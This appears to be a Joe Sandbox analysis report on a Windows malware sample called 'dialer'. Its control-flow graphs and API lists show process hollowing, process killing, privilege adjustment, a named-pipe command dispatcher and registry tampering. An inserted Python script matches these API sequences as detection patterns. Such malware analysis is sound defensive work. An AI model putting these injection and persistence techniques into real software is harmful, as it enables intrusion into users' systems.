                                                                                • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                                • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                                  • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                                  • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                                  • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                                  • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                                  • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                                  • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                                  • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                                                • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                                • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                                • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                                • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                • String ID:
                                                                                • API String ID: 1323846700-0
                                                                                • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                                • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                                • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                • String ID: .text$C:\Windows\System32\
                                                                                • API String ID: 2721474350-832442975
                                                                                • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                                • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                                • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                                • String ID: M$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2203880229-3489460547
                                                                                • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                                • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                                • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an image in the original; block list recovered from the graph data, executed/not-executed colouring not preserved): 9 basic blocks, 1400021d0-140002255. 1400021dd calls 140001b54 and either loops back through Sleep (1400021f2) or proceeds to ConnectNamedPipe (1400021fd); after ConnectNamedPipe the path is Sleep (140002241) or ReadFile (14000220c) followed by the checks at 14000222f and 140002236; every path rejoins at DisconnectNamedPipe (14000224c), which branches back to ConnectNamedPipe, so the routine is a persistent pipe-server loop.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 2071455217-3440882674
                                                                                • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                                • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                                • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an image in the original; recovered from the graph data): 12 basic blocks, 140002b38-140002bf4. The entry block allocates two heap buffers (GetProcessHeap/HeapAlloc twice), then K32EnumProcesses (140002b8e) branches either to Sleep (140002beb) and back to the enumeration, or into a loop over the returned PID list (140002ba3-140002bda) that calls 140002540 at 140002bcb; when the loop finishes it also goes through Sleep and re-enumerates, so this is a polling loop with no exit.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                                • String ID:
                                                                                • API String ID: 3676546796-0
                                                                                • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                                • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                                • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an image in the original; recovered from the graph data): 5 basic blocks, 1400018ac-140001912. OpenProcess (1400018ac) branches to the return block at 140001901 or to IsWow64Process (1400018d8), whose result is handled at 1400018ea before CloseHandle (1400018f8) and the return block.
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpenWow64
                                                                                • String ID:
                                                                                • API String ID: 10462204-0
                                                                                • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an image in the original; recovered from the graph data): 2 basic blocks. 140002258 calls 14000226c, then 140002261 calls ExitProcess.
                                                                                APIs
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                  • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                  • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                  • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                  • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                  • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                  • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                  • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                                  • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                  • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                  • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                  • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                  • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                  • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                  • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                  • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                                • String ID:
                                                                                • API String ID: 3836936051-0
                                                                                • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an image in the original; recovered from the graph data): about 90 basic blocks, 140002560-140002a8e, all converging on the exit block at 140002a74. A chain of comparisons at the entry (140002560, 140002592, 140002598, 1400025a5, 1400025ae, 1400025b7, 1400025c0, 14000273a, 140002748, 140002751, 14000275c, 140002761) selects one of the following branches, so the routine is a command dispatcher:
                                                                                • 1400025cb ReadFile -> 140002602 call 1400018ac -> either 140002624 call 1400010c0 or 140002638 -> 140002a66 call 140002a90
                                                                                • 140002660 RegOpenKeyExW -> 14000268d RegDeleteValueW -> 1400026a1 calls 1400019c4, 14000175c, 140001000 and 1400017ec
                                                                                • 1400026bd ExitProcess
                                                                                • 1400026c6 GetProcessHeap, HeapAlloc, K32EnumProcesses -> 14000271b call 1400010c0
                                                                                • 14000276c calls 14000217c and 1400021a8, then ExitProcess
                                                                                • 14000279d call 140001944 -> 1400027b4 ReadFile -> 1400027e9 GetProcessHeap, HeapAlloc, ReadFile -> checks at 14000282d, 14000283f, 140002851 -> either 14000285e -> 14000286f call 140001c88, or 140002881 lstrlenW, GetProcessHeap, HeapAlloc, call 140002a90, GetProcessHeap, HeapFree; cleanup at 14000290b GetProcessHeap -> 140002a52 HeapFree
                                                                                • 140002919 call 140001944 -> 140002932 call 140001944 -> 140002947 ShellExecuteW
                                                                                • 140002974 call 14000175c
                                                                                • 14000297e ReadFile -> 1400029b5 call 1400018ac -> 1400029db GetProcessHeap, HeapAlloc, call 1400014d8 -> loop over 140002a20-140002a44 (call 1400016cc) -> 140002a49 GetProcessHeap -> 140002a52 HeapFree; or 140002a5f -> 140002a66 call 140002a90
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                                                • String ID: SOFTWARE$dialerstager$open
                                                                                • API String ID: 3276259517-3931493855
                                                                                • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
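
The graph data printed in this section (node id, address range, API names, "call <callee>" and "a->b" edges) is easier to use when parsed than when read, and the routine at 140001c88 whose graph follows is the clearest case: its API calls only mean something in order. The script below is an added example by the editor, not part of this report or of the analysed sample. It parses Joe Sandbox's textual control-flow-graph export and checks whether the APIs of a behaviour signature occur in sequence along some path through the blocks. The two graph strings are copied verbatim from this section; the pattern names and the API chains are the editor's own choices (assumptions), picked to match the signatures the report raises.

```python
"""Parse Joe Sandbox's textual CFG export and match ordered API-call chains.

Added example for this report. The graph strings are copied from the report;
the behaviour patterns are the editor's own choices, not the sandbox's rules.
"""
import re
from collections import defaultdict, deque

# Graph of the routine at 140001c88 (copied from the report's CFG export).
HOLLOWING_CFG = """280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282
283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284
285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287
288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289
290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292
290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294
295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296
297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299
297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287
301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302
302->287 303 140001eba-140001ebf 302->303 303->289"""

# Graph of the pipe-server loop at 1400021d0 (copied from the report, header included).
PIPE_LOOP_CFG = """control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129
132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129
134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135
136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133
137->136 138 140002236-14000223f 137->138 138->136"""

NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")   # "start-end", or a lone address for 1-byte blocks
EDGE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(text):
    """Return (nodes, succ).

    nodes: id -> {"addr": "start-end", "apis": [imported APIs], "calls": [callee addrs]}
    succ:  id -> [successor ids], in the order the edges appear
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":   # header the export prints before the data
        tokens = tokens[1:]
    nodes, succ = {}, defaultdict(list)
    cur, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            succ[int(edge.group(1))].append(int(edge.group(2)))
            i += 1
            continue
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = int(tok)                               # "<id> <addr-range>" opens a new block
            nodes[cur] = {"addr": tokens[i + 1], "apis": [], "calls": []}
            i += 2
            continue
        if cur is None:
            raise ValueError(f"token before any block: {tok!r}")
        if tok == "call" and i + 1 < len(tokens):
            nodes[cur]["calls"].append(tokens[i + 1])    # "call <callee>": internal function
            i += 2
        else:
            nodes[cur]["apis"].append(tok)               # bare token: imported API called in block
            i += 1
    return nodes, succ


def has_api_chain(nodes, succ, chain):
    """True if some path through the graph calls the APIs in `chain` in that order.

    Other blocks may lie between consecutive hits; cycles are tolerated.
    """
    def blocks_calling(start, api):
        """Blocks reachable from `start` (exclusive) whose API list contains `api`."""
        seen, queue, hits = set(), deque(succ[start]), []
        while queue:
            n = queue.popleft()
            if n in seen:
                continue
            seen.add(n)
            if api in nodes.get(n, {}).get("apis", ()):
                hits.append(n)
            queue.extend(succ[n])
        return hits

    memo = {}

    def search(node, idx):
        if idx == len(chain):
            return True
        key = (node, idx)
        if key not in memo:
            memo[key] = any(search(n, idx + 1) for n in blocks_calling(node, chain[idx]))
        return memo[key]

    starts = [n for n, d in nodes.items() if chain[0] in d["apis"]]
    return any(search(n, 1) for n in starts)


# Behaviour signatures: editor's choices, mirroring the findings this report raises.
PATTERNS = {
    "PE injection via thread-context hijack": [
        "CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
        "GetThreadContext", "SetThreadContext", "ResumeThread",
    ],
    "named-pipe command loop": ["ConnectNamedPipe", "ReadFile", "DisconnectNamedPipe"],
    "process enumerate-and-kill": ["K32EnumProcesses", "OpenProcess", "TerminateProcess"],
}


def classify(cfg_text):
    """Names of every pattern whose API chain occurs in order somewhere in the graph."""
    nodes, succ = parse_cfg(cfg_text)
    return [name for name, chain in PATTERNS.items() if has_api_chain(nodes, succ, chain)]


if __name__ == "__main__":
    for label, cfg in (("140001c88", HOLLOWING_CFG), ("1400021d0", PIPE_LOOP_CFG)):
        blocks, _ = parse_cfg(cfg)
        print(f"{label}: {len(blocks)} blocks -> {classify(cfg) or ['no pattern matched']}")
```

The order check matters more than a plain API-name match: 140001c88 does call OpenProcess and TerminateProcess on its failure path, but never K32EnumProcesses, so the enumerate-and-kill chain does not fire on it; that chain belongs to the routine listed at the top of this section (APIs at 140001801-140001885 with the 1400014D8 subcall), whose graph the report does not export here. Feeding the graph of 140002560 to classify() returns nothing, which is also correct: the dispatcher only calls the injection routine, it does not contain it.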

                                                                                Control-flow Graph

                                                                                Control-flow graph (rendered as an image in the original; recovered from the graph data): 24 basic blocks, 140001c88-140001ebf. A retry loop at 140001cbb/140001e8c leads to CreateProcessW (140001cce); on success the path is VirtualAllocEx (140001d2b) -> WriteProcessMemory (140001d60), a loop of further WriteProcessMemory calls (140001d8c-140001dcc), VirtualAlloc (140001dd2) -> GetThreadContext (140001df1) -> WriteProcessMemory (140001e09) -> SetThreadContext (140001e30) -> ResumeThread (140001e4e) -> 140001eba. Every failing step branches to 140001e5d, which calls OpenProcess (140001e62) and TerminateProcess (140001e78) on the created process before returning to the retry loop.
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                • String ID: @
                                                                                • API String ID: 3462610200-2766056989
                                                                                • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                • String ID: dialersvc64
                                                                                • API String ID: 4184240511-3881820561
                                                                                • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: Delete$CloseEnumOpen
                                                                                • String ID: SOFTWARE\dialerconfig
                                                                                • API String ID: 3013565938-461861421
                                                                                • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
                                                                                Similarity
                                                                                • API ID: File$Write$CloseCreateHandle
                                                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                • API String ID: 148219782-3440882674
                                                                                • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.2156327099.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.2156255918.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156371659.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.2156447226.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_140000000_dialer.jbxd
